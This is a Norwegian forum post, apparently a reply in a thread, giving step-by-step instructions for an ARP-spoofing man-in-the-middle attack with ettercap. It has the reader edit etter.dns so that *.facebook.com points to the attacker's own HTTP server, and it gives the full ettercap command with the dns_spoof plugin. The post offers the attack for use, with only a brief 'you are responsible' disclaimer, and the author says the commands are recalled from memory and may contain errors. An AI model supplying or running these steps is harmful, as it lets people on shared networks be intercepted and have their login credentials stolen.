Som saint123 sier, så er ettercap den aller enkleste metoden får ARP spoofing.
En ARP pakke er en form får "handshaking" pakke som forteller hvem som er hvor på nettverket.
Ved å utføre en MiTM (MAN-IN-THE-MIDLE) attack, så får du alle nettverkstrafikk til å gå gjennom deg, og da er det jo enkelt får deg å filtrere bort de pakkene som skal til facebook.com å heller sende dem til din private http server.
Første steget er å finne IP-adressen DIN, Gateway IPen. Dette kan du gjøre ved ipconfig i windows eller ifconfig & route i linux.
Når du har gjort det, så må du endre en fil etter.dns (google det til windows) men i linux så finnes den som oftes under
Kode
/usr/share/ettercap/etter.dns
Denne filen skal stå på følgende måte
Kode
Domain_name A DIN_IP
f.eks:
Kode
*.facebook.com A 172.134.10.11
Der ip adressen fører til HTTP serveren.
Når det er gjort, så kan du starte opp HTTP serveren, og ettercap.
Kode
ettercap -T -M arp:remote -P dns_spoof /[GATEWAY IP]/ //
Men en viktig ting å huske på er først å undersøke infrastrukturen til nettverket, er ikkje alle nettverk dette fungerer på. Og andre ganger så fungerer det så bra at PCen blir en flaskehals.
Det kan være feil i kodene her, har tatt dette ut av hodet, en stund siden jeg har drevet på med MiTM angrep. Og husk dere er selv ansvarlige får personlige handlinger.